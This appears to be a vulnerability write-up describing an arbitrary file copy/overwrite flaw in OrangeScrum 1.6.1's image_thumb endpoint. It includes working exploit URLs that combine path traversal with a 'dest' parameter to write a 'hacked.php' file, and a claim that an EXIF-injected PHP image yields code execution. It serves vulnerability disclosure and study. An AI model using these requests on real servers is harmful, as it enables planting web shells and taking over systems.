The second bug of orangescrum 1.6.1 I want to discuss is arbitrary file copy/overwrite.
Ok lets start
Open menu “Users“, then click on an image profile, open in new tab. It will open new tab with url like this http://localhost/orangescrum/users/image_thumb/?type=photos&file=a6ebd6bd62ba537f37b7b8ac40aa626d.png&sizex=94&sizey=94&quality=100
It shows the image profile of the user.
The file is physically located at app/webroot/files/photos
Now we try to modify the url
It opens a file that is located at webroot/img/filter_icon.png
Hmmmmmmmm, so, how to copy anything into anything like I said before?
Lets take a look at the code. The code to process the url we talked about is in app/webroot/users/image_thumb/index.php at function image_thumb.
It calls another function GenerateThumbFile that located at app/webroot/users/image_thumb/ImageComponent.php
TLDR 😀 😀 It will copy the image if these condition is met :
- value of get variable sizex must equal to real width of the image
- value of get variable sizey must equal to real height of the image
- $this->image_type is true, dont worry it is true by default
- we must provide name file destination. we can provide it in get parameter dest
- USE_S3 is set to 0 (default is 0)
Ok, lets try to copy file filter_icon.png into app/webroot/file/photos/hacked.php
So, the url will be http://localhost/orangescrum/users/image_thumb/?type=photos&file=../../img/filter_icon.png&sizex=13&sizey=14&quality=100&dest=hacked.php
File filter_icon.png will be copied into app/webroot/users/image_thumb/hacked.php
Now we try to overwrite file hacked.php with file a6ebd6bd62ba537f37b7b8ac40aa626d.png , so we modify the url into http://localhost/orangescrum/users/image_thumb/?type=photos&file=a6ebd6bd62ba537f37b7b8ac40aa626d.png&sizex=120&sizey=120&quality=100&dest=hacked.php
What if we change our image profile with some image-exif-injected-php file and do like above?? I tried and succeed. You can try by yourself
Other related links :